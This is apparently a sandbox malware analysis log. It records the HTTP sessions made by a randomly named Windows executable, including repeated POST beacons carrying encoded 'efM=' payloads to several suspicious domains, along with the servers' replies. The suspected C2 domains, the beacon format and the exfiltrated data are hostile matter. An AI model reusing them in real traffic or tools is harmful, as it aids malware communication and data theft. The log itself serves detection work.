                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.4 | 55432 | 35.241.42.217 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:27.752913952 CEST | 723 | OUT | POST /zjwj/ HTTP/1.1
                                                    Host: www.tqfabxah.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.tqfabxah.com
                                                    Referer: http://www.tqfabxah.com/zjwj/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 65 41 76 31 78 6c 4e 7a 42 46 6a 75 43 75 66 2f 6b 41 6a 79 64 34 59 58 74 43 35 30 77 77 2b 50 79 6a 72 49 59 59 75 55 69 64 31 74 68 54 6d 44 61 2b 4f 4e 35 62 7a 31 77 4a 6b 74 6e 41 79 65 48 59 73 71 4e 59 76 38 48 41 66 70 41 53 39 57 6a 43 74 51 6f 46 32 4a 6a 47 6a 44 48 68 69 67 68 61 79 33 39 48 62 48 56 78 42 4c 4e 79 6d 63 79 62 2b 4a 4e 6c 6b 69 74 74 63 71 36 78 72 4f 6e 4f 4a 74 4c 4e 70 43 5a 4a 50 79 63 34 43 72 59 43 59 65 30 46 56 55 49 6b 6f 37 49 4a 6c 39 6e 46 76 57 46 47 73 75 6d 57 69 36 4b 5a 6f 69 4f 2f 61 47 51 67 4d 43 46 4d 64 6b 33 61 45 65 53 79 31 78 35 4d 56 75 7a 56 73 3d
                                                    Data Ascii: efM=qFjiaTJPEXcUeAv1xlNzBFjuCuf/kAjyd4YXtC50ww+PyjrIYYuUid1thTmDa+ON5bz1wJktnAyeHYsqNYv8HAfpAS9WjCtQoF2JjGjDHhighay39HbHVxBLNymcyb+JNlkittcq6xrOnOJtLNpCZJPyc4CrYCYe0FVUIko7IJl9nFvWFGsumWi6KZoiO/aGQgMCFMdk3aEeSy1x5MVuzVs=
                                                    Aug 5, 2024 15:33:28.385828972 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 05 Aug 2024 13:33:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Aug 5, 2024 15:33:28.389327049 CEST | 559 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.4 | 55433 | 35.241.42.217 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:30.286026955 CEST | 10805 | OUT | POST /zjwj/ HTTP/1.1
                                                    Host: www.tqfabxah.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.tqfabxah.com
                                                    Referer: http://www.tqfabxah.com/zjwj/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 65 41 76 31 78 6c 4e 7a 42 46 6a 75 43 75 66 2f 6b 41 6a 79 64 34 59 58 74 43 35 30 77 77 32 50 78 52 6a 49 58 66 79 55 6a 64 31 74 2f 6a 6d 4f 61 2b 4f 55 35 62 37 78 77 4a 6f 39 6e 47 32 65 42 39 67 71 63 64 62 38 49 41 66 70 4e 79 39 47 37 69 74 46 6f 45 47 4e 6a 48 54 44 48 68 69 67 68 63 2b 33 36 53 37 48 5a 52 42 49 4b 79 6d 59 6c 4c 2b 78 4e 68 41 55 74 73 63 51 35 42 4c 4f 6e 76 35 74 4f 37 31 43 52 4a 50 73 49 59 44 6f 59 43 56 4f 30 46 49 6c 49 6e 31 65 49 4a 52 39 6a 7a 61 38 56 6d 63 43 35 30 4f 6c 64 4f 45 64 41 34 69 37 4c 7a 5a 2f 4e 66 56 6d 6b 35 45 42 64 78 34 6c 6f 39 4e 4c 6d 54 65 54 32 77 41 66 75 39 49 79 76 7a 35 79 76 78 36 6a 4a 43 72 53 61 35 76 4f 63 58 44 54 6c 57 50 77 57 67 72 70 5a 51 30 37 49 78 47 30 4e 54 5a 6e 34 5a 72 44 2b 74 64 41 56 6d 58 69 5a 31 6b 4a 63 56 43 67 4f 4e 77 44 57 35 63 6a 4e 44 53 59 57 4c 73 41 30 72 68 45 41 69 51 6e 75 35 58 33 2b 77 4f 4e 4f 72 38 58 2b 32 46 34 56 52 2b 58 49 2f 58 35 6b 67 [TRUNCATED]
                                                    Data Ascii: efM=qFjiaTJPEXcUeAv1xlNzBFjuCuf/kAjyd4YXtC50ww2PxRjIXfyUjd1t/jmOa+OU5b7xwJo9nG2eB9gqcdb8IAfpNy9G7itFoEGNjHTDHhighc+36S7HZRBIKymYlL+xNhAUtscQ5BLOnv5tO71CRJPsIYDoYCVO0FIlIn1eIJR9jza8VmcC50OldOEdA4i7LzZ/NfVmk5EBdx4lo9NLmTeT2wAfu9Iyvz5yvx6jJCrSa5vOcXDTlWPwWgrpZQ07IxG0NTZn4ZrD+tdAVmXiZ1kJcVCgONwDW5cjNDSYWLsA0rhEAiQnu5X3+wONOr8X+2F4VR+XI/X5kgsACRzh6Uhkz1qejiUii5PlpDTaCFHvOKEnAJXDnDc8BAYWxWAWVx1GM3Qux53kwqV3HTwEAh83MtWJkfw/mzQ1KMut5EuZN2U0WEieRCWOEZ6YgY/NcLBqPaNJkaPMmZLAVNzmDfeKnO06V4uFGEimdBAp19ue1u9+eQpOcQzbtcVfryZ6jX6DZOj5XUOVN0nj9sHPVLcPPp11WMpbpuUzv0qtKtTOljnz7Qd47QX0nSzphz4KUxOU3ab7I5P8+vzmALYIXn8kcAZesuZxaN33qo06bdubsMN53tsX6UA9QOWCR6SOQXU3cE1gQksw9OnHjkpdcYzxi22Q+0yKK5Q/l1u7rEMJqpCFTpFSzBuDr3q/hZO80iB8HxoD+jV7mE/1Tl0rYput3LPVOpBizWvpL7WmIRsCc/dBK5PIkzexX7rKpBxoD05de61fTcxD8FypzOLfZ+f/TIUwOxSeE4IRyyUzUmkDCnYNYvEzN/5vmbfU5NuMn1ubP/9xyuIjF4A9uK6rDpRqHVMZ0j8Cg8oEVJlOcRBL6qEIG1782al2QGWOAhj18sBomgmR4Zzhq/fN6YEsvAMqgOhjGItZ5F/SOEjhY0ZQM+TmdO60naBj6CtziSds9lJVc6Gs9f4bjqKAT5a8MBgAtcce5F9n8XQLu7iVYGpe7h7P [TRUNCATED]
                                                    Aug 5, 2024 15:33:30.938205957 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 05 Aug 2024 13:33:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Aug 5, 2024 15:33:30.939831972 CEST | 559 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    36 | 192.168.2.4 | 55434 | 35.241.42.217 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:32.819037914 CEST | 437 | OUT | GET /zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.tqfabxah.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:33:33.467585087 CEST | 300 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 05 Aug 2024 13:33:33 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5161
                                                    Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                    Vary: Accept-Encoding
                                                    ETag: "65a4939c-1429"
                                                    Cache-Control: no-cache
                                                    Accept-Ranges: bytes
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Aug 5, 2024 15:33:33.481019974 CEST | 1236 | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                    Aug 5, 2024 15:33:33.481041908 CEST | 1236 | IN | Data Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                                    Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                    Aug 5, 2024 15:33:33.481056929 CEST | 1236 | IN | Data Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                                    Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                    Aug 5, 2024 15:33:33.481072903 CEST | 1236 | IN | Data Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                                    Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                    Aug 5, 2024 15:33:33.481098890 CEST | 217 | IN | Data Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                                    Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    37 | 192.168.2.4 | 55435 | 76.223.67.189 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:38.524996042 CEST | 718 | OUT | POST /l2ei/ HTTP/1.1
                                                    Host: www.rtrpodcast.online
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.rtrpodcast.online
                                                    Referer: http://www.rtrpodcast.online/l2ei/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 71 6c 4f 4a 31 64 44 33 35 49 42 78 63 4d 4b 7a 30 4c 75 68 42 46 67 4e 63 43 6c 47 62 56 4d 7a 64 6e 71 6f 43 39 77 78 66 53 77 47 2b 6b 72 53 4f 7a 38 62 4e 57 58 34 55 53 65 45 42 65 6d 6b 4c 77 5a 37 50 68 4d 5a 34 5a 55 50 49 57 6f 50 4c 46 35 78 73 74 51 34 7a 6b 34 59 39 39 68 6e 4d 52 73 43 4b 2b 74 54 6c 43 44 58 6e 4d 42 59 2f 77 4a 45 73 47 79 71 46 64 77 47 6b 36 38 79 5a 73 49 50 39 31 7a 5a 49 4a 43 69 6c 65 68 6b 4e 6b 4d 57 68 66 62 43 43 44 64 76 65 77 41 38 76 68 48 4f 4c 66 77 73 78 61 2b 68 51 44 36 76 7a 63 39 33 71 77 3d 3d
                                                    Data Ascii: efM=7PZJRSXxbWSlqlOJ1dD35IBxcMKz0LuhBFgNcClGbVMzdnqoC9wxfSwG+krSOz8bNWX4USeEBemkLwZ7PhMZ4ZUPIWoPLF5xstQ4zk4Y99hnMRsCK+tTlCDXnMBY/wJEsGyqFdwGk68yZsIP91zZIJCilehkNkMWhfbCCDdvewA8vhHOLfwsxa+hQD6vzc93qw==


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    38 | 192.168.2.4 | 55436 | 76.223.67.189 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:41.071110010 CEST | 738 | OUT | POST /l2ei/ HTTP/1.1
                                                    Host: www.rtrpodcast.online
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.rtrpodcast.online
                                                    Referer: http://www.rtrpodcast.online/l2ei/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 72 46 65 4a 32 2b 72 33 38 6f 42 2b 5a 4d 4b 7a 37 72 76 4a 42 46 38 4e 63 41 4a 76 59 6e 6f 7a 64 47 61 6f 42 38 77 78 59 53 77 47 6d 30 72 54 42 54 39 5a 4e 57 4c 77 55 54 69 45 42 66 43 6b 4c 31 64 37 49 53 6b 65 34 4a 55 4e 44 32 6f 42 47 6c 35 78 73 74 51 34 7a 6b 38 6d 39 39 70 6e 4d 67 38 43 4c 62 5a 55 35 53 44 51 67 4d 42 59 37 77 4a 49 73 47 79 45 46 59 6f 34 6b 35 49 79 5a 74 34 50 39 42 6e 61 43 4a 44 6e 36 75 67 42 65 6b 56 6e 75 66 66 4e 4a 46 52 7a 44 68 49 42 6a 48 57 55 61 75 52 37 6a 61 61 53 4e 45 7a 62 2b 66 41 2b 78 2f 7a 30 78 4a 66 57 62 48 78 76 2f 73 34 39 73 32 79 47 69 2f 59 3d
                                                    Data Ascii: efM=7PZJRSXxbWSlrFeJ2+r38oB+ZMKz7rvJBF8NcAJvYnozdGaoB8wxYSwGm0rTBT9ZNWLwUTiEBfCkL1d7ISke4JUND2oBGl5xstQ4zk8m99pnMg8CLbZU5SDQgMBY7wJIsGyEFYo4k5IyZt4P9BnaCJDn6ugBekVnuffNJFRzDhIBjHWUauR7jaaSNEzb+fA+x/z0xJfWbHxv/s49s2yGi/Y=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    39 | 192.168.2.4 | 55437 | 76.223.67.189 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:43.597143888 CEST | 10820 | OUT | POST /l2ei/ HTTP/1.1
                                                    Host: www.rtrpodcast.online
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.rtrpodcast.online
                                                    Referer: http://www.rtrpodcast.online/l2ei/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 72 46 65 4a 32 2b 72 33 38 6f 42 2b 5a 4d 4b 7a 37 72 76 4a 42 46 38 4e 63 41 4a 76 59 6e 67 7a 64 77 4f 6f 44 66 49 78 5a 53 77 47 34 6b 72 65 42 54 39 59 4e 57 54 30 55 54 75 55 42 63 71 6b 61 6a 68 37 4e 6a 6b 65 33 4a 55 4e 4d 57 6f 41 4c 46 34 31 73 74 67 38 7a 6c 4d 6d 39 39 70 6e 4d 69 55 43 4d 4f 74 55 37 53 44 58 6e 4d 42 55 2f 77 4a 73 73 43 6d 79 46 59 6b 6f 6b 4b 51 79 5a 4f 41 50 75 69 50 61 66 35 44 70 37 75 67 6a 65 6b 70 38 75 66 43 38 4a 46 4e 4a 44 68 4d 42 6a 43 76 4d 66 4d 4e 6a 38 36 4f 57 51 30 69 2f 2f 2f 77 37 78 4e 76 64 6e 63 2f 73 4f 48 35 6d 77 50 31 52 6f 6e 36 63 67 5a 36 31 59 69 69 42 43 50 58 59 6e 34 6b 56 37 65 62 2f 65 4f 6f 6e 68 32 77 63 41 55 6c 52 70 49 6e 55 70 2f 62 6d 41 52 4c 56 61 32 51 61 58 75 37 43 33 48 51 52 45 39 53 30 46 69 33 2b 79 66 4f 50 70 79 6b 75 76 30 46 79 67 79 53 4a 30 61 69 54 53 47 67 46 6a 43 44 44 46 32 37 64 68 77 49 2b 58 4e 36 57 61 69 7a 72 54 53 53 52 54 37 4b 77 2f 69 68 6d 50 4a [TRUNCATED]
                                                    Data Ascii: efM=7PZJRSXxbWSlrFeJ2+r38oB+ZMKz7rvJBF8NcAJvYngzdwOoDfIxZSwG4kreBT9YNWT0UTuUBcqkajh7Njke3JUNMWoALF41stg8zlMm99pnMiUCMOtU7SDXnMBU/wJssCmyFYkokKQyZOAPuiPaf5Dp7ugjekp8ufC8JFNJDhMBjCvMfMNj86OWQ0i///w7xNvdnc/sOH5mwP1Ron6cgZ61YiiBCPXYn4kV7eb/eOonh2wcAUlRpInUp/bmARLVa2QaXu7C3HQRE9S0Fi3+yfOPpykuv0FygySJ0aiTSGgFjCDDF27dhwI+XN6WaizrTSSRT7Kw/ihmPJUyULZTHFf2WZ5fB42ipgH1nAx4LlR1yMuCiVcruiyCmEvXBjSZsZXWCcbgUlP+llFv1WVfWEVrlZpC7oHWVzPdZ9qKqb94RmBhopjjvcts3b8EzbG/0dPeLelMcIDvHReifbTGNFJc5kKYcBeGaQoWkbJUff3GnKSz7w1C+yEpPOyKm+TrIjVdyOXTuS1nRqKh0bGU3yCY5MyLSS8mTKuhr5T8YgBPwF6rUQ8h8C3KLtpragOrZ969xdv1oSPCj+10P8cSUXvR6jqkeXGlGyeGtldq7cISQoD2ETKQlHeHp1Gcz/xsWi6YPDdKgNmoak6abMmAHfbNpSW/j9Wfyg9BqBVUMjp21o3IgiQhkHLIQfrRD6W8oLAh/68rPA1GaqS5TQGK5FF7XsgcJC8oOrq5coRyKbN63Z+CqsFJwkducktNYrM14pIy0Sna9dAIaUdM2IVKRq84M0nSxV2Zm1aSDBHlikQFqVrEX9sN2gGGzx6bxHOW7b5i+nDwGAgGzXjza52ST7cvQDHyPjrsUCbiwRn9KfBqJEx6SUURLElkpPzx5+9lug2OvdpnDMUHKjeeDffsnOanrcyxvrBiS2HEBa7pbco+KMgDkxtlRmPOnbfH0Pkn9RAOC3Z/35vfIHiRpULAD4OnDdzTe8/V2lel4qvbpy5Fisrt [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    40 | 192.168.2.4 | 55438 | 76.223.67.189 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:46.133927107 CEST | 442 | OUT | GET /l2ei/?GTP=uhqpjxIPh&efM=2NxpSnefRSOpgA+BoOniz/1uTtrxzrfiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINxooKAGgJDCdVs948iDsg681FEAENC5VGkiM= HTTP/1.1
                                                    Host: www.rtrpodcast.online
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:33:46.607428074 CEST | 393 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:33:46 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 253
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 54 50 3d 75 68 71 70 6a 78 49 50 68 26 65 66 4d 3d 32 4e 78 70 53 6e 65 66 52 53 4f 70 67 41 2b 42 6f 4f 6e 69 7a 2f 31 75 54 74 72 78 7a 72 66 69 4c 6d 4d 5a 58 6a 70 66 65 48 67 75 61 77 61 56 59 4f 4d 68 65 68 51 7a 77 79 58 4a 53 6e 35 64 4e 56 33 70 61 78 43 6b 4c 66 71 44 57 54 39 79 4c 78 49 4e 78 6f 6f 4b 41 47 67 4a 44 43 64 56 73 39 34 38 69 44 73 67 36 38 31 46 45 41 45 4e 43 35 56 47 6b 69 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GTP=uhqpjxIPh&efM=2NxpSnefRSOpgA+BoOniz/1uTtrxzrfiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINxooKAGgJDCdVs948iDsg681FEAENC5VGkiM="}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    41 | 192.168.2.4 | 55439 | 116.213.43.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:34:00.170471907 CEST | 700 | OUT | POST /jda9/ HTTP/1.1
                                                    Host: www.mqmsqkw.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.mqmsqkw.lol
                                                    Referer: http://www.mqmsqkw.lol/jda9/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
